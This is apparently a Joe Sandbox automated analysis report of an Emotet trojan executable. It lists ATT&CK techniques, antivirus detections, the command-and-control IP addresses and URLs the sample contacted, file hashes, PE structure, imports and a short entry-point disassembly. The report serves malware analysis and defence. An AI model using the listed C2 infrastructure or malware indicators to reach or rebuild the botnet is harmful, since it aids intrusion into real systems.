              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Hidden Files and Directories
              LSA Secrets14
              System Information Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common2
              Obfuscated Files or Information
              Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items13
              Software Packing
              DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
              File Deletion
              Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              cGOpAkgTL.exe97%ReversingLabsWin32.Trojan.Emotet
              cGOpAkgTL.exe64%VirustotalBrowse
              cGOpAkgTL.exe100%AviraHEUR/AGEN.1361713
              cGOpAkgTL.exe100%Joe Sandbox ML
              No Antivirus matches
              SourceDetectionScannerLabelLinkDownload
              1.2.cGOpAkgTL.exe.1d0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.2.cGOpAkgTL.exe.270000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.cGOpAkgTL.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.Gen7Download File
              SourceDetectionScannerLabelLink
              windowsupdatebg.s.llnwi.net1%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://190.117.51.248:443/100%Avira URL Cloudmalware
              http://23.240.26.210/e0%Avira URL Cloudsafe
              https://104.33.204.83:443/0%Avira URL Cloudsafe
              http://23.240.26.210/0%Avira URL Cloudsafe
              https://190.117.51.248:443/9%VirustotalBrowse
              https://104.33.204.83:443/9%VirustotalBrowse
              http://23.240.26.210/6%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              windowsupdatebg.s.llnwi.net
              95.140.230.192
              truefalseunknown
              NameMaliciousAntivirus DetectionReputation
              https://190.117.51.248:443/true
              • 9%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              https://104.33.204.83:443/true
              • 9%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://23.240.26.210/mapirepl.exe, 00000004.00000002.1157092094.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, mapirepl.exe, 00000004.00000002.1157092094.0000000000594000.00000004.00000020.00020000.00000000.sdmpfalse
              • 6%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://23.240.26.210/emapirepl.exe, 00000004.00000002.1157092094.0000000000594000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              72.47.248.48
              unknownUnited States
              31815MEDIATEMPLEUStrue
              165.227.213.173
              unknownUnited States
              14061DIGITALOCEAN-ASNUStrue
              173.248.147.186
              unknownUnited States
              30475WEHOSTWEBSITES-COMUStrue
              5.9.128.163
              unknownGermany
              24940HETZNER-ASDEtrue
              190.111.215.2
              unknownArgentina
              11014CPSARtrue
              66.209.69.165
              unknownUnited States
              23005SWITCH-LTDUStrue
              186.23.186.99
              unknownArgentina
              27747TelecentroSAARtrue
              190.144.66.30
              unknownColombia
              14080TelmexColombiaSACOtrue
              219.94.254.93
              unknownJapan9371SAKURA-CSAKURAInternetIncJPtrue
              109.104.79.48
              unknownUnited Kingdom
              20738GD-EMEA-DC-LD5GBtrue
              159.65.76.245
              unknownUnited States
              14061DIGITALOCEAN-ASNUStrue
              181.16.4.180
              unknownArgentina
              27984VerTvSAARtrue
              143.0.245.169
              unknownArgentina
              12150COTELCAMARtrue
              138.68.139.199
              unknownUnited States
              14061DIGITALOCEAN-ASNUStrue
              144.76.117.247
              unknownGermany
              24940HETZNER-ASDEtrue
              210.2.86.72
              unknownViet Nam
              24085QTSC-AS-VNQuangTrungSoftwareCityDevelopmentCompanyVNtrue
              192.163.199.254
              unknownUnited States
              46606UNIFIEDLAYER-AS-1UStrue
              185.86.148.222
              unknownLatvia
              52173MAKONIXLVtrue
              190.117.51.248
              unknownPeru
              12252AmericaMovilPeruSACPEtrue
              190.171.105.158
              unknownCosta Rica
              52263TelecableEconomicoSACRtrue
              92.48.118.27
              unknownUnited Kingdom
              29550SIMPLYTRANSITGBtrue
              186.138.205.189
              unknownArgentina
              10318TelecomArgentinaSAARtrue
              51.255.50.164
              unknownFrance
              16276OVHFRtrue
              69.163.33.82
              unknownUnited States
              46816DSNETWORKS-001UStrue
              189.208.239.98
              unknownMexico
              6503AxtelSABdeCVMXtrue
              70.28.3.120
              unknownCanada
              577BACOMCAtrue
              200.55.136.2
              unknownCuba
              27725EmpresadeTelecomunicacionesdeCubaSACUtrue
              85.105.205.77
              unknownTurkey
              9121TTNETTRtrue
              73.115.132.124
              unknownUnited States
              7922COMCAST-7922UStrue
              186.137.133.132
              unknownArgentina
              10318TelecomArgentinaSAARtrue
              209.159.244.240
              unknownUnited States
              20412CLARITY-TELECOMUStrue
              184.161.177.223
              unknownCanada
              5769VIDEOTRONCAtrue
              164.77.138.194
              unknownChile
              6471ENTELCHILESACLtrue
              201.184.224.178
              unknownColombia
              13489EPMTelecomunicacionesSAESPCOtrue
              104.33.204.83
              unknownUnited States
              20001TWC-20001-PACWESTUStrue
              23.240.26.210
              unknownUnited States
              20001TWC-20001-PACWESTUStrue
              23.254.203.51
              unknownUnited States
              54290HOSTWINDSUStrue
              Joe Sandbox Version:37.1.0 Beryl
              Analysis ID:861748
              Start date and time:2023-05-09 03:24:12 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 4m 53s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:5
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:cGOpAkgTL.exe
              (renamed file extension from bin to exe, renamed because original name is a hash value)
              Original Sample Name:cGOpAkgTL.bin
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@6/0@0/37
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 2
              • Number of non-executed functions: 0
              • Exclude process from analysis (whitelisted): dllhost.exe
              • Excluded IPs from analysis (whitelisted): 209.197.3.8, 104.18.32.68, 172.64.155.188
              • Excluded domains from analysis (whitelisted): crl.comodoca.com.cdn.cloudflare.net, ctldl.windowsupdate.com, crl.usertrust.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              03:24:22API Interceptor27x Sleep call for process: cGOpAkgTL.exe modified
              03:24:31API Interceptor952x Sleep call for process: mapirepl.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              72.47.248.4800_29_G-087448.docGet hashmaliciousEmotetBrowse
              • 72.47.248.48:7080/JDgER70J0yebw2/
              219.94.254.932919-04-29-Emotet-binary-retrieved-by-Word-macro.exeGet hashmaliciousBrowse
                2919-04-29-Emotet-binary-updated-after-initial-infection.exeGet hashmaliciousBrowse
                  2019-04-29-extracted-from-zip-archive-Word-doc-with-macro-for-Emotet.docGet hashmaliciousBrowse
                    392578042401_Apr_29_2019.docGet hashmaliciousBrowse
                      2919-04-29-Emotet-binary-retrieved-by-Word-macro.exeGet hashmaliciousBrowse
                        2019-04-29-extracted-from-zip-archive-Word-doc-with-macro-for-Emotet.docGet hashmaliciousBrowse
                          2919-04-29-Emotet-binary-updated-after-initial-infection.exeGet hashmaliciousBrowse
                            165.227.213.173ERHHGet hashmaliciousCryptOne EmotetBrowse
                              66.209.69.1657mB0FoVcSn.exeGet hashmaliciousEmotetBrowse
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                windowsupdatebg.s.llnwi.nethttps://gardotrin.ddns.net/bp/Get hashmaliciousUnknownBrowse
                                • 178.79.225.0
                                https://donsixthree.com/Get hashmaliciousUnknownBrowse
                                • 95.140.230.128
                                https://admire.pages.dev/Get hashmaliciousUnknownBrowse
                                • 178.79.225.0
                                https://bafybeigbywaah3iux3pe7mlkcpcofk7vvwlcangxznp2343r7kjg3l6iim.ipfs.dweb.link/index.htm?email=@Get hashmaliciousHTMLPhisherBrowse
                                • 95.140.230.128
                                MCC-NEWORDER_73FILE_KEY_323033.vbsGet hashmaliciousFormBookBrowse
                                • 95.140.230.128
                                TAX-INVOICE-UAE-UNPAID-NOTIFICATION.vbsGet hashmaliciousUnknownBrowse
                                • 95.140.230.128
                                https://w3domain.org/web?911adGet hashmaliciousUnknownBrowse
                                • 95.140.230.192
                                http://humblecooperate.comGet hashmaliciousUnknownBrowse
                                • 178.79.225.0
                                ywvVE9lVnz.vbsGet hashmaliciousAsyncRATBrowse
                                • 178.79.225.128
                                HTTPCacheLog.dllGet hashmaliciousUnknownBrowse
                                • 178.79.225.0
                                confirmation-swift-payment.jsGet hashmaliciousAsyncRATBrowse
                                • 95.140.230.192
                                INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                                • 178.79.225.0
                                https://hassan-gamall.github.io/netflix/Get hashmaliciousUnknownBrowse
                                • 178.79.225.0
                                https://login.ib-bakinginterntt.com/Get hashmaliciousUnknownBrowse
                                • 178.79.225.128
                                https://www.condongbowlingclub.com.au/.auth/Get hashmaliciousHTMLPhisherBrowse
                                • 95.140.230.192
                                Setup.exeGet hashmaliciousRedLineBrowse
                                • 178.79.225.128
                                VGOCffRsso.exeGet hashmaliciousAmadey, RedLineBrowse
                                • 95.140.230.192
                                PO00045789632.exeGet hashmaliciousAsyncRAT, AveMaria, Neshta, UACMeBrowse
                                • 178.79.225.0
                                a3BDnjY3Vf.exeGet hashmaliciousAmadey, RedLineBrowse
                                • 95.140.230.192
                                file.exeGet hashmaliciousAmadey, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                                • 95.140.230.192
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                MEDIATEMPLEUST36vmr9l.exeGet hashmaliciousEmotetBrowse
                                • 70.32.115.157
                                85YNYHHfee.elfGet hashmaliciousMiraiBrowse
                                • 216.70.79.1
                                xpng5kkgI.dllGet hashmaliciousEmotetBrowse
                                • 70.32.115.157
                                skid.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                • 64.207.132.207
                                05E9WsH93Q.elfGet hashmaliciousUnknownBrowse
                                • 64.13.246.84
                                tBWe0cmiBd.dllGet hashmaliciousEmotetBrowse
                                • 70.32.115.157
                                8zUwwWqR15.elfGet hashmaliciousMiraiBrowse
                                • 64.13.201.116
                                https://storageapi.fleek.co/d71b6b5d-a59e-4991-9393-f6cfd942579b-bucket/inbox.html#info@callallstar.comGet hashmaliciousHTMLPhisherBrowse
                                • 205.186.187.133
                                https://ipfs.fleek.co/ipfs/QmRWDegqQyW8a53stvpUvtgixdriBkLJ8ij4dajVmZpTCx/#info@eastsidemobileautoglass.comGet hashmaliciousHTMLPhisherBrowse
                                • 205.186.187.133
                                NIGi5.elfGet hashmaliciousMiraiBrowse
                                • 64.13.201.119
                                hXLXfTLR0O.elfGet hashmaliciousMiraiBrowse
                                • 64.13.248.124
                                iZNau4ksFxGet hashmaliciousMiraiBrowse
                                • 72.47.199.28
                                skid.x86_64-20220815-1818Get hashmaliciousMoobotBrowse
                                • 64.13.201.123
                                tyPaBU5o0oGet hashmaliciousMiraiBrowse
                                • 64.13.201.115
                                5022E4nLqsGet hashmaliciousMiraiBrowse
                                • 72.47.199.22
                                https://bavierdesign-com.jimdosite.com/Get hashmaliciousHTMLPhisherBrowse
                                • 72.47.208.90
                                phish_alert_iocp_v1.4.48.emlGet hashmaliciousHTMLPhisherBrowse
                                • 72.47.208.90
                                botx.mpslGet hashmaliciousMiraiBrowse
                                • 72.47.199.22
                                E3mbtPKpoj.dllGet hashmaliciousWannacryBrowse
                                • 64.13.201.128
                                28MAKD7gkhGet hashmaliciousMiraiBrowse
                                • 72.47.199.29
                                DIGITALOCEAN-ASNUST36vmr9l.exeGet hashmaliciousEmotetBrowse
                                • 192.241.146.84
                                KBDYAK.exeGet hashmaliciousEmotetBrowse
                                • 45.55.219.163
                                https://api.getjusto.com/redirect?to=https%3A%2F%2Fdt2n51.codesandbox.io/?register=YWxhbi5sb3R0QHpiZXRhY29uc3VsdGluZy5jb20=Get hashmaliciousUnknownBrowse
                                • 159.89.3.224
                                http://5gmesh.net/Verify/Get hashmaliciousUnknownBrowse
                                • 174.138.56.8
                                dIS2G0Y5vE.exeGet hashmaliciousAgentTesla, Amadey, Lokibot, Raccoon Stealer v2, RedLineBrowse
                                • 209.97.151.202
                                https://branka-wilmhurt.mykajabi.com/harriscomputerGet hashmaliciousUnknownBrowse
                                • 159.203.152.67
                                SIGNED_ORDER.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                • 159.89.168.198
                                DOCUMENT.exeGet hashmaliciousAgentTeslaBrowse
                                • 159.89.168.198
                                https://hjdjdf76434hdjfd.web.app/Get hashmaliciousHTMLPhisherBrowse
                                • 157.230.187.138
                                bMvg.exeGet hashmaliciousXWormBrowse
                                • 138.197.189.80
                                Request_for_Quotation.exeGet hashmaliciousBluStealer, ThunderFox Stealer, a310LoggerBrowse
                                • 167.99.35.88
                                SIGNED_ORDER.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                • 159.89.168.198
                                https://api.getjusto.com/redirect?to=https%3A%2F%2Fblog.investmango.com%2Fcity%2Fwithipoplive%2Fallnawaiste%2Ff82xa5%2F%2F%2F%2FdHN0cnVua21hbm4tbWVpc3RlckBjYXBkeW4uY29tGet hashmaliciousUnknownBrowse
                                • 159.89.144.124
                                Request_for_Quotation.exeGet hashmaliciousBluStealer, ThunderFox Stealer, a310LoggerBrowse
                                • 167.99.35.88
                                REQUSET_FOR_QUOTATION.exeGet hashmaliciousDarkCloudBrowse
                                • 167.99.35.88
                                XRYC8iouXD.elfGet hashmaliciousMirai, MoobotBrowse
                                • 157.245.211.176
                                Purchase_Order.exeGet hashmaliciousBluStealer, ThunderFox Stealer, a310LoggerBrowse
                                • 167.99.35.88
                                swift_copy_$37,000.00.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                • 159.89.168.198
                                INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                                • 159.89.168.198
                                https://pub-6502dddebdc447ed9023277db681dd94.r2.dev/vm3.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 167.71.22.239
                                No context
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):5.690892374707669
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:cGOpAkgTL.exe
                                File size:334088
                                MD5:b5e31f4e2836b8a67f8684988d224107
                                SHA1:9816f30629d210b64742be970d412512df600c11
                                SHA256:efed59c2b1473891a2032927baebe69c87dcace3d87e0b359fe583bbe9181b9b
                                SHA512:df796b4f07339444517b9a869e39b94529660767925f10d6744575b10a2845af870f9b108e3b5129b301bcbc226032f4d2a938e426a104c4a2bb3d2cf3e36d4b
                                SSDEEP:3072:W52YsjMOAfd5UrsEvMzeLq+c1WPE68En5EsqYaVGm7/e5zzcW:BYgMrjUwE0KLk368uaVGlcW
                                TLSH:2764E5796CAF08B5CF1B8DB3DD64C69521D1FB287D33A34F8006B599D83272069AB513
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P|.9...j...j...j.Ohj...j3..j...j...j...j...j...j.O~j...j.Oij...j.Olj...jRich...j........................PE..L...J..\...........
                                Icon Hash:e8f8b2d1319bc668
                                Entrypoint:0x404da0
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                Time Stamp:0x5C7FC94A [Wed Mar 6 13:21:14 2019 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:0
                                File Version Major:5
                                File Version Minor:0
                                Subsystem Version Major:5
                                Subsystem Version Minor:0
                                Import Hash:b4e1a1f1c6ea9653edb6a4eea8901766
                                Signature Valid:false
                                Signature Issuer:CN=MNCIDLXK
                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                Error Number:-2146762487
                                Not Before, Not After
                                • 3/6/2019 6:42:25 AM 12/31/2039 3:59:59 PM
                                Subject Chain
                                • CN=MNCIDLXK
                                Version:3
                                Thumbprint MD5:CD3D71C2C497CF155471A0C8EBF5CB4D
                                Thumbprint SHA-1:7282EE73B03710F2C1BFD00A6A9F7AC0C16A373D
                                Thumbprint SHA-256:80DCFB0B033828B8417920E7A8B75DDF0DD14F1BEABD64181FA525FEC7B5AF86
                                Serial:CFF025AB763F39A6407EA5D2E35A6690
                                Instruction
                                push ebp
                                mov ebp, esp
                                sub esp, 14h
                                mov dword ptr [ebp-08h], 00000000h
                                mov dword ptr [ebp-04h], 00000000h
                                push 000004DCh
                                push 000001CFh
                                call 00007EFD38631672h
                                add esp, 08h
                                mov dword ptr [ebp-04h], 00000001h
                                jmp 00007EFD3863192Bh
                                mov eax, dword ptr [ebp-04h]
                                add eax, 01h
                                mov dword ptr [ebp-04h], eax
                                cmp dword ptr [ebp-04h], 01FCA055h
                                jnc 00007EFD38631924h
                                jmp 00007EFD3863190Eh
                                mov edx, dword ptr [ebp+08h]
                                mov dword ptr [00444D5Ch], edx
                                mov dword ptr [00444D3Ch], ebp
                                mov dword ptr [ebp-04h], 00000000h
                                jmp 00007EFD38631922h
                                mov ecx, dword ptr [00406004h]
                                mov dword ptr [00444D94h], ecx
                                push 000004DCh
                                push 000001CFh
                                call 00007EFD3863161Fh
                                add esp, 08h
                                mov dword ptr [ebp-04h], 00000000h
                                mov edx, dword ptr [00444CF8h]
                                add edx, dword ptr [ebp-04h]
                                mov byte ptr [edx], 0000006Ah
                                mov eax, dword ptr [00444CF8h]
                                add eax, dword ptr [ebp-04h]
                                mov byte ptr [eax+01h], 0000006Fh
                                mov ecx, dword ptr [00444CF8h]
                                add ecx, dword ptr [ebp-04h]
                                mov byte ptr [ecx+02h], 00000075h
                                mov edx, dword ptr [00444CF8h]
                                add edx, dword ptr [ebp-04h]
                                mov byte ptr [edx+03h], 00000066h
                                mov eax, dword ptr [00444CF8h]
                                add eax, dword ptr [ebp-04h]
                                mov byte ptr [eax+04h], 00000073h
                                mov ecx, dword ptr [00444CF8h]
                                add ecx, dword ptr [ebp-04h]
                                Programming Language:
                                • [ASM] VS2008 build 21022
                                • [IMP] VS2005 build 50727
                                • [ C ] VS2008 build 21022
                                • [RES] VS2008 build 21022
                                • [LNK] VS2008 build 21022
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0xfd300x78.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x450000xd9e0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x50c000xd08.rsrc
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x60000x408.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x4a4b0x4c00False0.8237561677631579data7.440597257986008IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x60000xb3940xb400False0.5960503472222223data5.524645379479194IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x120000x32db40x32e00False0.39076896498771496data5.081796379641181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x450000xd9e00xda00False0.43276949541284404data5.084431522271247IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountry
                                RT_BITMAP0x457500x428Device independent bitmap graphic, 16 x 16 x 32, image size 1024
                                RT_BITMAP0x45b780x1028Device independent bitmap graphic, 32 x 32 x 32, image size 4096
                                RT_BITMAP0x46ba00x428Device independent bitmap graphic, 16 x 16 x 32, image size 1024
                                RT_BITMAP0x46fc80x428Device independent bitmap graphic, 16 x 16 x 32, image size 1024
                                RT_BITMAP0x473f00x428Device independent bitmap graphic, 16 x 16 x 32, image size 1024
                                RT_BITMAP0x478180x428Device independent bitmap graphic, 16 x 16 x 32, image size 1024
                                RT_BITMAP0x47c400x1028Device independent bitmap graphic, 32 x 32 x 32, image size 4096
                                RT_BITMAP0x48c680x428Device independent bitmap graphic, 16 x 16 x 32, image size 1024
                                RT_ICON0x4a9a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States
                                RT_ICON0x4b8480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States
                                RT_ICON0x4c0f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States
                                RT_ICON0x4c6580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States
                                RT_ICON0x4ec000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States
                                RT_ICON0x4fca80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States
                                RT_ICON0x506300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States
                                RT_RCDATA0x490900x10data
                                RT_RCDATA0x490a00x98data
                                RT_RCDATA0x491380x4d8Delphi compiled form 'TfrmAutoUpdateCheck'
                                RT_RCDATA0x496100xb8cDelphi compiled form 'TMadExcept'
                                RT_RCDATA0x4a1a00x34bDelphi compiled form 'TMEContactForm'
                                RT_RCDATA0x4a4f00x227Delphi compiled form 'TMEDetailsForm'
                                RT_RCDATA0x4a7180x286Delphi compiled form 'TMEScrShotForm'
                                RT_RCDATA0x524200x5bfXML 1.0 document, ASCII textEnglishUnited States
                                RT_GROUP_ICON0x50a980x68dataEnglishUnited States
                                RT_VERSION0x50b000x314dataGermanGermany
                                RT_VERSION0x50e180x310dataEnglishUnited States
                                RT_VERSION0x511280x32cdataSpanishSpain
                                RT_VERSION0x514580x330dataFrenchFrance
                                RT_VERSION0x517880x330dataPortugueseBrazil
                                RT_VERSION0x51ab80x310dataEnglishGreat Britain
                                RT_VERSION0x51dc80x32cdataSpanishMexico
                                RT_VERSION0x520f80x328dataPortuguesePortugal
                                DLLImport
                                KERNEL32.dllFileTimeToLocalFileTime, FindClose, FindFirstFileW, FindNextFileW, FindResourceW, FlushInstructionCache, FormatMessageW, FreeLibrary, FreeResource, GenerateConsoleCtrlEvent, GetACP, GetCPInfo, GetCommandLineW, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetDateFormatW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetEnvironmentVariableW, GetExitCodeThread, GetFileAttributesW, GetFileType, GetFullPathNameW, GetLastError, GetLocalTime, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleW, GetNamedPipeHandleStateW, GetOverlappedResult, GetPrivateProfileSectionW, GetPrivateProfileStringW, GetProcAddress, GetStartupInfoA, GetStdHandle, GetSystemDefaultLCID, GetSystemInfo, GetSystemTime, GetTempFileNameW, GetTempPathW, GetThreadLocale, GetThreadSelectorEntry, GetTickCount, GetTimeZoneInformation, GetVersion, GetVersionExW, GetVolumeInformationA, GetWindowsDirectoryW, GlobalAddAtomW, GlobalDeleteAtom, GlobalFindAtomW, GlobalFree, HeapCreate, HeapDestroy, InitAtomTable, InitializeCriticalSection, InterlockedCompareExchange, InterlockedDecrement, InterlockedExchange, InterlockedExchangeAdd, InterlockedIncrement, IsBadReadPtr, IsDBCSLeadByte, FileTimeToDosDateTime, LeaveCriticalSection, LoadLibraryExW, LoadLibraryW, LoadResource, LocalAlloc, LocalFileTimeToFileTime, LocalFree, LockResource, MapViewOfFile, Module32FirstW, MoveFileExW, MoveFileW, MulDiv, MultiByteToWideChar, OpenFileMappingW, OpenProcess, OpenSemaphoreA, OutputDebugStringW, RaiseException, ReadFile, ReplaceFile, ResetEvent, ResetWriteWatch, ResumeThread, RtlUnwind, SearchPathW, SetComputerNameW, SetConsoleOutputCP, SetEndOfFile, SetEnvironmentVariableW, SetErrorMode, SetEvent, SetFileAttributesW, SetFilePointer, SetFileTime, SetLastError, SetStdHandle, SetThreadLocale, SignalObjectAndWait, SizeofResource, Sleep, SwitchToThread, SystemTimeToFileTime, TerminateProcess, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, UnmapViewOfFile, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, VirtualQueryEx, WaitForMultipleObjectsEx, WaitForSingleObject, WideCharToMultiByte, WinExec, WriteFile, WritePrivateProfileStringA, WritePrivateProfileStringW, WriteProcessMemory, lstrcpyW, lstrcpynW, lstrlenW, GetModuleHandleA, ExitThread, ExitProcess, EnumUILanguagesA, EnumCalendarInfoA, EnterCriticalSection, DosDateTimeToFileTime, DeleteFileW, DeleteCriticalSection, CreateToolhelp32Snapshot, CreateThread, CreateProcessW, CreateFileW, CreateFileMappingW, CreateFileA, CreateEventW, CreateDirectoryW, CreateDirectoryExW, CopyFileExA, CompareStringW, CompareStringA, CloseHandle, IsValidLocale, CancelTimerQueueTimer
                                USER32.dllGetSystemMetrics, GetWindow, GetWindowLongW, GetWindowRect, GetWindowTextW, IsWindow, IsWindowVisible, LoadBitmapW, LoadCursorW, LoadIconW, LoadStringW, MapWindowPoints, MessageBoxW, OemToCharA, OemToCharBuffA, PeekMessageW, PostMessageW, RegisterClassExW, ReleaseDC, SendDlgItemMessageW, SendMessageW, SetDlgItemTextW, SetFocus, SetForegroundWindow, SetWindowLongW, SetWindowPos, SetWindowTextW, ShowWindow, TranslateMessage, UpdateWindow, WaitForInputIdle, wvsprintfA, wvsprintfW, IsWindowUnicode, GetDoubleClickTime, GetDialogBaseUnits, IsWindowEnabled, IsCharUpperA, DrawMenuBar, EndMenu, InSendMessage, IsClipboardFormatAvailable, GetMessageExtraInfo, CharNextW, ReleaseCapture, IsCharAlphaNumericW, CreateMenu, CloseWindow, CloseDesktop, GetListBoxInfo, CloseWindowStation, WindowFromDC, IsMenu, OpenIcon, GetFocus, GetParent, GetMessageW, GetDlgItemTextW, GetDlgItem, GetDC, GetClientRect, GetClassNameW, FindWindowExW, EndDialog, EnableWindow, DispatchMessageW, DialogBoxParamW, DestroyWindow, DestroyIcon, DefWindowProcW, CreateWindowExW, CopyRect, CharUpperW, CharUpperA, CharToOemBuffW, CharToOemBuffA, CharToOemA, GetSysColor
                                GDI32.dllGetObjectType, CreatePatternBrush, CloseFigure, DeleteObject, DeleteEnhMetaFile, SaveDC
                                ADVAPI32.dllOpenProcessToken, RegOpenKeyA, SetFileSecurityW, SetFileSecurityA, RegSetValueExW, RegQueryValueExW, RegOpenKeyExW, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCloseKey, RegCreateKeyExW
                                IMM32.dllImmGetContext, ImmGetOpenStatus, ImmReleaseContext
                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States
                                GermanGermany
                                SpanishSpain
                                FrenchFrance
                                PortugueseBrazil
                                EnglishGreat Britain
                                SpanishMexico
                                PortuguesePortugal
                                TimestampSource PortDest PortSource IPDest IP
